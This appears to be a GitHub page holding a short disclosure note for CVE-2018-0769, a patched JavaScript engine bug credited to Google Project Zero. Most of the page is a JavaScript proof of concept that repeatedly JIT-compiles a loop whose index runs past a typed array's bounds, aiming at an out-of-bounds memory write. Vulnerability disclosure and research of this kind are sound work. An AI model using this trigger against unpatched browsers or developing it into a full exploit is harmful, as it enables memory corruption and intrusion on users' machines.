Skip to content

Latest commit

 

History

History
34 lines (26 loc) · 709 Bytes

CVE-2018-0769.md

File metadata and controls

34 lines (26 loc) · 709 Bytes
Raw

CVE-2018-0769

  • Fix: Jan 2018
  • Credit: lokihardt of Google Project Zero

PoC

function opt(arr) {
    if (arr.length <= 15)
        return;

    let j = 0;
    for (let i = 0; i < 2; i++) {
        arr[j] = 0x1234;  // (a)
        j += 0x100000;
        j + 0x7ffffff0;
    }
}

function main() {
    for (let i = 0; i < 0x10000; i++) {
        opt(new Uint32Array(100));
    }
}

main();

Reference